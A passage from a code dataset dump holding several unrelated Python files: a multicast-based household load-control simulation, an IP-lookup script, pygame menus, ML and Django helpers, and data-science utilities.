self.outsideConditions.get_weatherHistory(unixtime=int(self.timestamp) + (60*60*2), report=False)\n        \n        \n        # # get weather conditions for current timestamp\n        \n        # self.To = np.interp([float(self.timestamp)], self.outsideConditions.df_weather['unixtime'].astype('float64'), self.outsideConditions.df_weather['temperature'].astype('float64'))[0]\n        # try:\n        #     self.humidity = np.interp([self.timestamp],self.outsideConditions.df_weather['unixtime'],self.outsideConditions.df_weather['humidity'])[0]\n        # except:\n        #     self.humidity = 0.90\n        \n        # try:\n        #     self.windSpeed = np.interp([self.timestamp],self.outsideConditions.df_weather['unixtime'],self.outsideConditions.df_weather['windSpeed'])[0]\n        # except:\n        #     self.windSpeed = 0\n        self.get_solarIrradiance() # get the solar irradiance on the roof and the walls\n\n        self.get_applianceLoad() # get the forecasted appliance load based on a regression formula\n        self.get_lightingLoad() # get the forecasted lighting load based on a regression formula\n        self.adjust_limit() # adjust the total power limit for the house\n        self.broadcast(state=\"proposed\")\n        self.broadcast(state=\"actual\")\n\n
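# Aside: broadcast() below drains its bounded Queue before putting the fresh reading, so
# consumers always see only the latest snapshot. A minimal standalone sketch of that
# idiom; the function name and sample payloads here are made up for illustration.
import queue

def put_latest(q, item):
    # discard anything stale, then publish the newest item
    while not q.empty():
        try:
            q.get(block=False)
            q.task_done()
        except queue.Empty:
            break
    q.put(item, block=False)

q = queue.Queue(maxsize=3)
put_latest(q, {'demand': 120.0})
put_latest(q, {'demand': 135.5})  # replaces the earlier snapshot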
def broadcast(self, state):\n        # Tell peers about my demand and flexibility\n        if state=='proposed':\n            dict_demand = {str(self.name):\n                    {\"type\": self.loadType,\n                    \"unixtime\": self.timestamp,\n                    \"house\": self.name,\n                    \"demand\": self.lightingLoad + self.applianceLoad,\n                    \"flexibility\": 0.0,\n                    \"priority\": 0.0,\n                    \"temp_out\": self.To,\n                    \"irradiance\": self.irradiance,\n                    \"signal\": self.ldc_signal,\n                    \"limit\": self.ourLimit,\n                    \"total\": self.proposedDemand,\n                    }\n                }\n\n            try:\n                while self.q_proposedDemand.empty() is False:\n                    self.q_proposedDemand.get(block=False)\n                    self.q_proposedDemand.task_done()\n                \n                self.q_proposedDemand.put(dict_demand, block=False)\n                self.dict_proposedDemand = dict_demand\n            except Exception as e:\n                print(\"Error in \", self.name, \" broadcast_proposed:\", e)\n                pass # raised if q is empty\n\n        elif state=='actual':\n            dict_demand = {str(self.name):\n                    {\"type\": self.loadType,\n                    \"unixtime\": self.timestamp,\n                    \"house\": self.name,\n                    \"demand\": self.lightingLoad + self.applianceLoad,\n                    \"flexibility\": 0.0,\n                    \"priority\": 0.0,\n                    \"temp_out\": self.To,\n                    \"irradiance\": self.irradiance,\n                    \"signal\": self.ldc_signal,\n                    \"limit\": self.ourLimit,\n                    \"total\": self.actualDemand,\n                    }\n                }\n            try:\n                while self.q_actualDemand.empty() is False:\n                    self.q_actualDemand.get(block=False)\n                    self.q_actualDemand.task_done()\n                \n                self.q_actualDemand.put(dict_demand, block=False)\n                self.dict_actualDemand = dict_demand\n            except Exception as e:\n                print(\"Error in \", self.name, \"broadcast_actual:\", e)\n                pass # raised if q is empty\n        else:\n            pass\n\n    def query(self, state):\n        # Ask peers about their demand and flexibility\n        try:\n            dict_msg = {self.name:state}\n            dict_demand = MULTICAST.send(dict_msg, ip=self.mcast_ip_local, port=self.mcast_port_local)\n            if state=='proposed':\n                dict_demand.update(self.dict_proposedDemand)\n            elif state=='actual':\n                dict_demand.update(self.dict_actualDemand)\n\n            df_demand = pd.DataFrame.from_dict(dict_demand, orient='index')\n            df_demand = df_demand.loc[(df_demand['house']==self.name)]\n            df_demand[['demand','flexibility','priority']] = df_demand[['demand','flexibility','priority']].astype(float)\n\n            return df_demand\n\n        except Exception as e:\n            print(\"Error in \", self.name, \" query:\", e)  # df_demand may not exist at this point, so do not print it\n            return pd.DataFrame(columns=['id','demand','flexibility','priority'])\n\n\n    def decide(self):\n        pass\n        return\n\n\n\n\n\n    def receive_ldcSignal(self):\n        # Receive ldc signal\n        # Note: In actual device implementation\n        # this is to detect 760 - 860 Hz signal on the line\n        # and going through filtering, and signal processing\n        # self.ldc_signal = ldc_signal\n\n\n        # get the latest ldc signal\n        try:\n            while self.q_ldc.empty() is False:\n                self.dict_command = self.q_ldc.get(block=False)\n                self.q_ldc.task_done()\n        except Exception as e:\n            print(\"Error in \", self.name, \" receive_ldcSignal:\", e)\n        self.algorithm = list(self.dict_command)[0]\n        self.ldc_signal = self.dict_command[self.algorithm]\n        return self.algorithm, self.ldc_signal\n\n\n    def interpret_ldcSignal(self, algorithm, ldc_signal, \n        minval=0.0, maxval=1.0, ldc_upper=860, ldc_lower=760):\n        # convert ldc signal to a ldc command\n        # signal value ranges from 760 to 860 Hz \n        if algorithm=='A0':\n            self.ldc_command = 1\n        elif algorithm=='A1':\n            # Signal means the offset deviation from target\n            # when target is hit, the ldc injector sends mid frequency, ldc_command is zero, and limit is not adjusted\n            # when loading is below target, ldc sends frequency above mid_freq, ldc_command is positive, limit is increased\n            # when loading is above target, ldc sends frequency below mid_freq, ldc_command is negative, limit is decreased\n            mid_freq = np.mean([ldc_lower,ldc_upper])\n            self.ldc_command = (ldc_signal - mid_freq) / (ldc_upper-ldc_lower)\n        elif algorithm=='A2':\n            # Signal means the target percent loading of the transformer\n            # limit is adjusted to the target percentage\n            self.ldc_command = (((ldc_signal - ldc_lower) / (ldc_upper-ldc_lower)) * (maxval-minval)) + minval\n        else:\n            self.ldc_command = 1\n        \n        return self.ldc_command\n
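# Aside: worked numbers for interpret_ldcSignal above, using its own defaults
# (ldc_lower=760, ldc_upper=860, so mid_freq = 810):
#   A1: signal 860 -> (860-810)/100 = +0.50 (raise the limit by half of housePower)
#       signal 810 ->  0.00               (on target, leave the limit alone)
#       signal 760 -> -0.50               (shed half of housePower)
#   A2: signal 810 -> (810-760)/100 = 0.50 (cap the house at 50% of housePower)
mid_freq = (760 + 860) / 2  # 810 Hz
assert (860 - mid_freq) / (860 - 760) == 0.5
assert (810 - 760) / (860 - 760) == 0.5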
def adjust_limit(self):\n        # adjust group's power limit using the ldc signal\n\n        self.algorithm, self.ldc_signal = self.receive_ldcSignal()\n        self.ldc_signal = float(self.ldc_signal) # ensure signal is float\n        self.ldc_command = self.interpret_ldcSignal(self.algorithm, self.ldc_signal)\n\n        if self.algorithm=='A0':\n            self.ourLimit = self.housePower\n        elif self.algorithm=='A1':\n            # option 1, uses percent offset from the target\n            # Since ldc_command means to ramp up or ramp down, e.g., positive or negative deviation\n            # power limit is added (or subtracted) with the fraction of the housePower\n            # with lower and upper limits at 0% and 150% respectively\n            self.ourLimit += self.housePower * self.ldc_command\n            self.ourLimit = np.clip(self.ourLimit, 0.0, self.housePower*1.5)\n        elif self.algorithm=='A2':\n            # option 2, uses percentage loading target\n            # Since ldc_command means the desired loading level\n            # power limit is adjusted to such percentage loading\n            self.ourLimit = self.housePower * self.ldc_command\n        else:\n            self.ourLimit = self.housePower\n\n        return self.ourLimit\n        \n\n    def record_history(self):\n        [load.record_history() for load in self.loads] # let all loads record their history\n        self.timeHistory.append(self.timestamp)\n        self.flexibilityHistory.append(self.flexibility)\n        self.proposedDemandHistory.append(self.proposedDemand)\n        self.actualDemandHistory.append(self.actualDemand)\n\n\n    #--- BACKGROUND THREADS ---\n    def receive_mcast(self):\n        # Receive multicast message from the group\n        multicast_ip = self.mcast_ip_local\n        port = self.mcast_port_local\n\n        multicast_group = (multicast_ip, port) # (ip_address, port)\n\n        # Create the socket\n        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)\n        sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n        # Bind to the server address\n        sock.bind(multicast_group)\n\n        # Tell the operating system to add the socket to\n        # the multicast group on all interfaces.\n        group = socket.inet_aton(multicast_ip)\n        mreq = struct.pack('4sL', group, socket.INADDR_ANY)\n        sock.setsockopt(\n            socket.IPPROTO_IP,\n            socket.IP_ADD_MEMBERSHIP,\n            mreq)\n        \n        dict_toSend_proposed= {}\n        dict_toSend_actual= {}\n        # Receive/respond loop\n        while True:\n            # receive and decode message\n            data, address = sock.recvfrom(1024)\n            received_msg = data.decode(\"utf-8\")\n            dict_msg = ast.literal_eval(received_msg)\n            # prepare data to send, fetch latest data from the queue\n            try:\n                # Note: house name is used as the key, 'all' is a query from the aggregator \n                for key in dict_msg: \n                    if key in [self.name, \"all\"]: \n                        if dict_msg[key] in [\"proposed\", \"p\"]:\n                            while self.q_proposedDemand.empty(): pass\n                            dict_onQueue_proposed = self.q_proposedDemand.get(block=False)\n                            self.q_proposedDemand.put(dict_onQueue_proposed)\n                            self.q_proposedDemand.task_done()\n\n                            dict_toSend_proposed.update(dict_onQueue_proposed)\n                            message_toSend_proposed = str(dict_toSend_proposed).encode()\n\n                            # send message\n                            sock.sendto(message_toSend_proposed, address)\n                        \n                        elif dict_msg[key] in [\"actual\", \"a\"]:\n                            while self.q_actualDemand.empty(): pass\n                            dict_onQueue_actual = self.q_actualDemand.get(block=False)\n                            self.q_actualDemand.put(dict_onQueue_actual)\n                            self.q_actualDemand.task_done()\n\n                            dict_toSend_actual.update(dict_onQueue_actual)\n                            message_toSend_actual = str(dict_toSend_actual).encode()\n                            \n                            # send message\n                            sock.sendto(message_toSend_actual, address)\n\n\n                        # elif 
dict_msg[key]==\"ldc\":\n # while self.q_actualDemand.empty() is False:\n # dict_onQueue_actual = self.q_actualDemand.get(block=False)\n # self.q_actualDemand.task_done()\n\n else:\n pass\n else:\n pass\n except Exception as e:\n print(\"Error in \", self.name, \" receive_mcast: \", e)\n pass \n return\n\n\n def receive_mcast_global(self):\n # Receive peers' operation status (e.g., demand, flexibility)\n # Receive multicast message from the group\n multicast_ip = self.mcast_ip_global\n port = self.mcast_port_global\n \n multicast_group = (multicast_ip, port) # (ip_address, port)\n\n # Create the socket\n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n # Bind to the server address\n sock.bind(multicast_group)\n\n # Tell the operating system to add the socket to\n # the multicast group on all interfaces.\n group = socket.inet_aton(multicast_ip)\n mreq = struct.pack('4sL', group, socket.INADDR_ANY)\n sock.setsockopt(\n socket.IPPROTO_IP,\n socket.IP_ADD_MEMBERSHIP,\n mreq)\n \n dict_toSend_proposed= {}\n dict_toSend_actual= {}\n # Receive/respond loop\n while True:\n # receive and decode message\n data, address = sock.recvfrom(1024)\n received_msg = data.decode(\"utf-8\")\n dict_msg = ast.literal_eval(received_msg)\n # prepare data to send, fetch latest data from the queue\n try:\n # Note: house name is used as the key, 'all' is a query from the aggregator \n for key in dict_msg: \n if key in [self.name, \"all\"]: \n if dict_msg[key] in [\"proposed\", \"p\"]:\n while self.q_proposedDemand.empty(): pass\n dict_onQueue_proposed = self.q_proposedDemand.get(block=False)\n self.q_proposedDemand.put(dict_onQueue_proposed)\n self.q_proposedDemand.task_done()\n\n dict_toSend_proposed.update(dict_onQueue_proposed)\n message_toSend_proposed = str(dict_toSend_proposed).encode()\n\n # send message\n sock.sendto(message_toSend_proposed, address)\n \n elif dict_msg[key]in [\"actual\", \"a\"]:\n while self.q_actualDemand.empty(): pass\n dict_onQueue_actual = self.q_actualDemand.get(block=False)\n self.q_actualDemand.put(dict_onQueue_actual)\n self.q_actualDemand.task_done()\n\n dict_toSend_actual.update(dict_onQueue_actual)\n message_toSend_actual = str(dict_toSend_actual).encode()\n \n # send message\n sock.sendto(message_toSend_actual, address)\n\n\n # elif dict_msg[key]==\"ldc\":\n # while self.q_actualDemand.empty() is False:\n # dict_onQueue_actual = self.q_actualDemand.get(block=False)\n # self.q_actualDemand.task_done()\n\n else:\n pass\n else:\n pass\n except Exception as e:\n print(\"Error in \", self.name, \" receive_mcast_global: \", e)\n pass \n return\n\n\n\n # def drive_chroma(self):\n # # Send data to Chroma variable load simulator\n # # through serial interface (rs232)\n # ser = serial.Serial(\n # port='/dev/ttyAMA0',\n # baudrate = 57600,\n # parity=serial.PARITY_NONE,\n # stopbits=serial.STOPBITS_ONE,\n # bytesize=serial.EIGHTBITS,\n # timeout=1\n # )\n\n # # send command to load simulator\n # ser.write('[LOAD:]POW[:LEV][:AMPL][:AC] '+ str(self.demand))\n # ser.write(':POW ' + str(self.demand))\n # # measure apparent power\n # VA = ser.write(':MEAS:POW:APP?')\n # # measure real power\n # WATT = ser.write(':MEAS:POW?')\n # # measure reactive power\n # VAR = ser.write(':MEAS:POW:REAC?')\n # # measure power factor\n # PF = ser.write(':MEAS:POW:PFAC?')\n # # measure frequency\n # FREQ = ser.write(':MEAS:FREQ?')\n\n\n\n\n def step(self):\n # simulation step for the house and all loads therein\n\n\n # t = 
time.perf_counter() # to record time lapse\n        # self.update_data()\n        # sumGen = [gen.get_powerOutput() for gen in self.generators]\n        # [gen.record_History() for gen in self.generators]\n        # [load.propose_demand() for load in self.loads]\n        # self.df_proposedDemand = self.query(state=\"proposed\")\n        # self.proposedDemand = np.sum(self.df_proposedDemand['demand']) + self.lightingLoad + self.applianceLoad\n        # [load.decide() for load in self.loads]\n        # [load.update_demand() for load in self.loads]\n        # self.df_actualDemand = self.query(state=\"actual\")\n        # self.actualDemand = np.sum(self.df_actualDemand['demand']) + self.lightingLoad + self.applianceLoad\n        # self.flexibility = np.mean([load.flexibility for load in self.loads])\n        # [load.simulate_model() for load in self.loads]\n\n        #---display total time lapsed for one simulation step\n        # print(\"Proposed demand: \", self.proposedDemand, \n        #     \" Actual demand: \", self.actualDemand,\n        #     \" Avg flexibility: \", self.flexibility,\n        #     \" LDC Signal: \", self.ldc_signal,\n        #     )\n        # print(time.perf_counter()-t)\n\n        while True:\n            try:\n                t = time.perf_counter() # to record time lapse\n                self.clock.step()\n                self.update_data()\n                # print(self.timestamp, self.name, self.lightingLoad, self.applianceLoad)\n                # time.sleep(np.random.normal(5,1))\n                self.df_proposedDemand = self.query(state=\"proposed\")\n                self.proposedDemand = np.sum(self.df_proposedDemand['demand']) + self.lightingLoad + self.applianceLoad\n                self.df_actualDemand = self.query(state=\"actual\")\n                self.actualDemand = np.sum(self.df_actualDemand['demand']) + self.lightingLoad + self.applianceLoad\n                self.flexibility = np.mean(self.df_actualDemand['flexibility'])\n                # time.sleep(abs(np.random.normal(3,3)))\n                \n                print(\"unixtime:\", self.timestamp, \" house:\", self.name, \" proposed:\", self.proposedDemand, \" actual:\", self.actualDemand, \"limit:\", self.ourLimit)\n            except Exception as e:\n                print(\"Error in \", self.name, \" step:\", e)\n            \n\n\n################### TEST CALLS #################################################################################\n\n\n################################################################################################################\n\n\n","sub_path":"ldc_system/HOUSE.py","file_name":"HOUSE.py","file_ext":"py","file_size_in_byte":33222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"145978141","text":"import os\nimport re\n\npattern = r\"描述.*(controller|控制器).*\"\nrx = re.compile(pattern,re.IGNORECASE)\n\nallinfo = os.popen(\"ipconfig -all\").readlines()\nfor line in allinfo:\n    # when a line matches the adapter-description pattern, record its index\n    if rx.search(line):\n        n = allinfo.index(line)\n        break\nnetinfo = allinfo[n:n+6] # slice out the sub-list that contains the IP\nfor line in netinfo:\n    if \"IPv4\" in line:\n        ip = line.split(':')[1].split('(')[0].strip() # split with split(), remove whitespace with strip()\n        print(ip)\n        break\nelse:\n    print(\"Network cable unplugged or device not enabled!\")\n\n","sub_path":"getIP.py","file_name":"getIP.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"250417015","text":"class Operand():\n\n    DEFAULT_PARAM1 = 0\n    DEFAULT_PARAM2 = 0\n    DEFAULT_PARAM3 = \"PLUS1\"\n\n    def __init__(self, param1:int = DEFAULT_PARAM1, param2: int = DEFAULT_PARAM2, param3: str =DEFAULT_PARAM3):\n        self.param1 = param1\n        self.param2 = param2\n        self.param3 = param3\n    \n    @staticmethod\n    def func(param1,param2,param3):\n        try:\n            if(str.upper(param3) == \"PLUS1\"):\n                return Operand.fnc_plus1(param1,param2)\n            elif(str.upper(param3) == \"KUADRAT\"):\n                return 
Operand.fnc_kuadrat(param1,param2)\n elif(str.upper(param3) == \"FIBONACCI\"):\n return Operand.fnc_fibonacci(param1,param2)\n else:\n return \"Menu doesn't exists\"\n except:\n return \"Please input valid parameter (int, int, str)\"\n\n def fnc_plus1(param1, param2):\n list_plus1=[]\n # list_plus1 = list(range(param1,param2+1)) #CaraCepatPlus1\n try:\n for plus in range(param1, param2+1):\n # print(\"Ke {}\".format(plus))\n if(plus == param1):\n list_plus1.append(param1)\n else:\n param1=param1+1\n if(param1<=param2):\n list_plus1.append(param1)\n return list_plus1 \n except TypeError:\n return \"Please input valid integer\"\n # print(\"Plus 1 : function ({},{},'{}') -> {}\".format(self.param1,self.param2,self.param3,list_plus1))\n\n def fnc_kuadrat(param1, param2):\n list_exponent=[]\n kuadrat_result = 0\n iteration = 1\n try:\n while(kuadrat_result<=param2):\n kuadrat_result=param1**iteration\n print(\"Ke {}, Kuadrat: {}\".format(iteration, kuadrat_result))\n if(kuadrat_result<=param2):\n list_exponent.append(kuadrat_result)\n iteration = iteration+1\n return list_exponent\n except TypeError:\n return \"Please input valid integer\"\n # print(\"Kuadrat : function ({},{},'{}') -> {}\".format(self.param1,self.param2,self.param3,list_exponent))\n\n def fnc_fibonacci(param1, param2):\n list_fbnc=[]\n curr_val = 0\n prev_val = 1\n stt=0\n #0,1,1,2,3,5,8,13,21,34\n try:\n while(stt<=param2):\n if(stt>=param1):\n list_fbnc.append(stt)\n curr_val=stt+prev_val\n prev_val=stt\n stt=curr_val\n return list_fbnc\n # print(\"Fibonacci : function ({},{},'{}') -> {}\".format(self.param1,self.param2,self.param3,list_fbnc))\n except TypeError:\n return \"Please input valid integer\"","sub_path":"session11/src/service/operand.py","file_name":"operand.py","file_ext":"py","file_size_in_byte":2764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"653560889","text":"import pygame\nimport utils, cfg\nfrom pygame.locals import *\nimport sys\n\n\nclass WinMessage:\n\n continue_button = K_SPACE\n exit = K_ESCAPE\n\n def __init__(self):\n pygame.font.init()\n self.font = pygame.font.SysFont('TimesNewRoman', 30)\n self.winner = 'I do not know'\n\n def draw(self, screen):\n \"\"\"This is the function that gets called to actually display on the screen.\"\"\"\n #textsurface = self.myfont.render('Congratulations! You found each other!', False, (0, 0, 0))\n text=\"Congratulations, {}! You Won! \\n \\nTo play again press the Space Button \\n \\nIf you want to exit the game, Press ESC\".format(self.winner)\n screen.fill((75,166,193))\n utils.blit_text(screen, text, (99,250), self.font)\n\n def run(self, screen):\n while True:\n self.draw(screen)\n pygame.display.flip()\n for event in pygame.event.get():\n if event.type == KEYUP:\n if event.key == self.continue_button:\n return\n\n if event.key == K_ESCAPE:\n pygame.quit()\n sys.exit()\n\n\n\nclass StartGame:\n\n easy_mode=K_1\n normal_mode=K_2\n hard_mode=K_3\n\n def __init__(self):\n pygame.font.init()\n self.font = pygame.font.SysFont('TimesNewRoman', 25)\n\n def draw(self, screen):\n \"\"\"This is the function that gets called to actually display on the screen.\"\"\"\n text = \"Welcome to the Game! 
\\n \\nTo start the game please press the following buttons \\n \\n-To play an Easy Mode Press 1 \\n \\n-To Play a Normal Mode Press 2 \\n \\n-To Play a Hard Mode Press 3\"\n #textsurface = self.font.render(\"This is Start Screen \\nPress the Space Button to start\", False, (0, 0, 0))\n screen.fill((75,166,193))\n utils.blit_text(screen, text, (99,150), self.font)\n return\n\n def run(self, screen):\n while True:\n self.draw(screen)\n pygame.display.flip()\n for event in pygame.event.get():\n if event.type == KEYUP:\n if event.key == self.easy_mode:\n cfg.ai_players = 3\n cfg.ai_move_probability = 1\n return\n if event.key == self.normal_mode:\n cfg.ai_players = 7\n cfg.ai_move_probability = 5\n return\n if event.key == self.hard_mode:\n cfg.ai_players = 15\n cfg.ai_move_probability = 10\n return\n if event.key == K_ESCAPE:\n pygame.quit()\n sys.exit()\n\n\nclass GameText:\n\n continue_button = K_SPACE\n\n def __init__(self):\n pygame.font.init()\n self.font = pygame.font.SysFont('TimesNewRoman', 25)\n\n def draw(self, screen):\n \"\"\"This is the function that gets called to actually display on the screen.\"\"\"\n text = \"How to Play the Game!? \\n \\n-To move up - Press the Up or W Button \\n \\n-To move down - Press the Down or S Button \\n \\n-To move left - Press the Left or A Button \\n \\n-To move right - Press the Right or D Button \\n \\nReady to Start? \\nLet's Go! Press the Space Button!\"\n screen.fill((75,166,193))\n utils.blit_text(screen, text, (30,30), self.font)\n\n def run(self, screen):\n while True:\n self.draw(screen)\n pygame.display.flip()\n for event in pygame.event.get():\n if event.type==KEYUP:\n if event.key ==self.continue_button:\n return\n if event.key==K_ESCAPE:\n pygame.quit()\n sys.exit()\n\n\n\n\n\n","sub_path":"colorgame/menus.py","file_name":"menus.py","file_ext":"py","file_size_in_byte":3810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"81723442","text":"import io\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\nfrom sklearn.metrics import confusion_matrix\n\nimport tensorflow as tf\nfrom tensorflow.keras.applications import MobileNetV2\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense\n\ndef get_confusion_matrix(y_true, y_pred, class_names, normalize='pred'):\n\n # get the confusion matrix\n cnf = confusion_matrix(y_true=y_true, y_pred=y_pred, normalize=normalize)\n df_cm = pd.DataFrame(cnf, index=class_names, columns=class_names)\n\n # plot it using seaborn\n plt.figure(figsize = (9,8))\n ax = sns.heatmap(df_cm, annot=True, cmap=\"Blues\")\n plt.ylabel('True label')\n plt.xlabel('Predicted label')\n\n buf = io.BytesIO()\n plt.savefig(buf, format='png')\n \n # Closing the figure prevents it from being displayed directly inside the notebook.\n plt.close(ax.figure)\n buf.seek(0)\n \n # Use tf.image.decode_png to convert the PNG buffer\n # to a TF image. 
Make sure you use 4 channels.\n    image = tf.image.decode_png(buf.getvalue(), channels=4)\n    \n    # Use tf.expand_dims to add the batch dimension\n    image = tf.expand_dims(image, 0)\n\n    return image\n\ndef create_model():\n    \n    # Creating a mobilenet backbone\n    backbone = MobileNetV2(weights = 'imagenet', include_top = True, input_shape=(224,224,3))\n    # Removing the last classification layer to adapt it to our classification problem (5 classes)\n    backbone.layers.pop()\n\n    # Creating a sequential model with a mobilenetv2 backbone and a dense layer\n    model = Sequential()\n    model.add(backbone)\n    model.add(Dense(5, activation='softmax', name='predictions'))\n    \n    return model\n","sub_path":"utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"480323124","text":"from rest_framework import serializers\nfrom .models import Category, Products\n\nclass ProductsSerializer(serializers.ModelSerializer):\n    class Meta:\n        model = Products\n        fields = (\n            \"id\",\n            \"name\",\n            \"get_absolute_url\",\n            \"description\",\n            \"price\",\n            \"get_image\",\n            \"get_thumbnail\"\n        )\n\nclass CategorySerializer(serializers.ModelSerializer):\n    products = ProductsSerializer(many=True)\n\n    class Meta:\n        model = Category\n        fields = (\n            \"id\",\n            \"name\",\n            \"slug\",\n            \"products\",\n            \"get_absolute_url\",\n        )\n","sub_path":"django_backend/products/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"300217131","text":"import numpy as np\nfrom sklearn.preprocessing import MinMaxScaler\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\n\n\ndata = np.random.randint(0, 100, (10, 2))\n\nscaler_model = MinMaxScaler()\n# preprocessing that scales the minimum to 0 and the maximum to 1\n\nscaler_model.fit(data)\nprint(scaler_model.transform(data))\n# apply the fitted scaler_model to data\n\n# scaler_model.fit_transform(data)\n# run fit and transform in a single call\n\n\n## sample of building test data with scikit-learn\nmydata = pd.DataFrame(data=np.random.randint(0, 101, (50, 4)), columns=['f1', 'f2', 'f3', 'label'])\ndf = pd.DataFrame(data=mydata)\nx = df[['f1', 'f2', 'f3']]\n# extract only the f1, f2 and f3 columns from df\n\ny = df['label']\n# extract only the label column from df\n\nX_train, X_test, Y_train, Y_test = train_test_split(\n    x, y, test_size=0.3, random_state=42\n)\n# split x and y into training data and test data\n# test_size: fraction of the data reserved for testing\n# random_state: random seed; fixing it makes every run produce the same split\n# X_train: feature matrix for training\n# X_test: feature matrix for testing\n# Y_train: target variable for training\n# Y_test: target variable for testing\n\nprint(df)\nprint(X_train)\nprint(X_test.shape)\n# show the shapes of X_train and X_test\n","sub_path":"Deeplearning_lecture/lecture_1/sklearn-sample1.py","file_name":"sklearn-sample1.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"571533515","text":"class ActionHandler(object):\n    def __init__(self):\n        self.description = \"Generic Action Handler\"\n    \n    def help(self):\n        return \"Unimplemented\"\n\n    def do(self, state):\n        return state\n    \nclass Move(ActionHandler):\n    def do(self, state):\n        \"\"\"\n        state - a dictionary containing the game's state.\n        Checks for exits in the proper direction and returns the new room if true,\n        otherwise false.\n        \"\"\"\n        action = state[\"action\"].split()\n        if len(action) > 1:\n            if len(action[1]) > 0:\n                state[\"location\"] = state[\"objects\"][state[\"location\"].attachments[action[1]]]\n                state[\"action\"] = 
\"look\"\n # This calls the Look action directly, there is probably a \n # better way to do this.\n look = Look()\n state = look.do(state)\n else:\n state[\"message\"].append(\"There are no exits that way.\") \n else:\n state[\"message\"].append(\"Which direction?\")\n \n return state\n\nclass Look(ActionHandler):\n def do(self, state):\n \"\"\"\n state - a dictionary containing the game state.\n Re-prints the room's play description or inspects an object in the room.\n \"\"\"\n action = state[\"action\"].split()\n if(len(action) > 1):\n # I don't remember what I was doing here...\n return state\n else:\n state[\"message\"].append(state[\"location\"].description)\n if len(state[\"location\"].contents) > 0:\n contents = \", a \".join(\"[%s]\" % k for k in state[\"location\"].contents.values())\n else:\n contents = \"nothing\" \n state[\"message\"].append(\"This room contains a %s.\" % contents)\n\n return state\n ","sub_path":"Utopia/controllers.py","file_name":"controllers.py","file_ext":"py","file_size_in_byte":1837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"440640524","text":"import subprocess\nimport sys\nimport pandas as pd\nimport numpy as np\nimport math\nfrom sklearn import metrics\nimport matplotlib.pyplot as plt\n\ndef runcmd(cmd, verbose=False):\n sproc = subprocess.Popen(cmd, shell=True, stdin=subprocess.PIPE, \n stdout=subprocess.PIPE, stderr=subprocess.PIPE, )\n output = ''\n numlines = 0\n error = True\n while True:\n if error:\n line = sproc.stderr.readline().decode(\"utf-8\")\n if line == '' and (sproc.poll() is None or sproc.poll() == 0):\n error = False\n if not error:\n line = sproc.stdout.readline().decode(\"utf-8\")\n if line == '' and sproc.poll() is not None:\n break\n if verbose:\n sys.stdout.write(line)\n sys.stdout.flush()\n output = output + line\n numlines = numlines + 1\n return error, output.strip(), numlines\n\ndef make_dummies_with_limits(df, colname, min_recs=0.005,\\\n max_dummies=20, defcatname='Other',\\\n nospacechr='_'):\n if min_recs < 1:\n min_recs = df.shape[0]*min_recs\n topvals_df = df.groupby(colname).size().reset_index(name=\"counts\").\\\n sort_values(by=\"counts\", ascending=False).reset_index()\n other_l = topvals_df[(topvals_df.index > max_dummies) |\\\n (topvals_df.counts < min_recs)][colname].to_list()\n if len(other_l):\n df.loc[df[colname].isin(other_l), colname] = defcatname\n if len(nospacechr):\n df[colname] = df[colname].str.replace(' ',\\\n nospacechr, regex=False)\n return pd.get_dummies(df, prefix=[colname], columns=[colname])\n\ndef make_dummies_from_dict(df, colname, match_dict, \n drop_orig=True, nospacechr='_'):\n if type(match_dict) is list:\n if len(nospacechr):\n match_dict = {match_key:match_key.\\\n replace(' ', nospacechr)\\\n for match_key in match_dict }\n else:\n match_dict = {match_key:match_key\\\n for match_key in match_dict}\n for match_key in match_dict.keys():\n df[colname+'_'+match_dict[match_key]] =\\\n np.where(df[colname].str.contains(match_key), 1, 0)\n if drop_orig:\n return df.drop([colname], axis=1)\n else:\n return df\n \ndef evaluate_class_mdl(fitted_model, X_train, X_test, y_train, y_test):\n y_train_pred = fitted_model.predict(X_train)\n y_test_prob = fitted_model.predict_proba(X_test)[:,1]\n y_test_pred = np.where(y_test_prob > 0.5, 1, 0)\n roc_auc = metrics.roc_auc_score(y_test, y_test_prob)\n plt.figure(figsize = (12,12))\n plt.tick_params(axis = 'both', which = 'major', labelsize = 12)\n fpr, tpr, _ = metrics.roc_curve(y_test, 
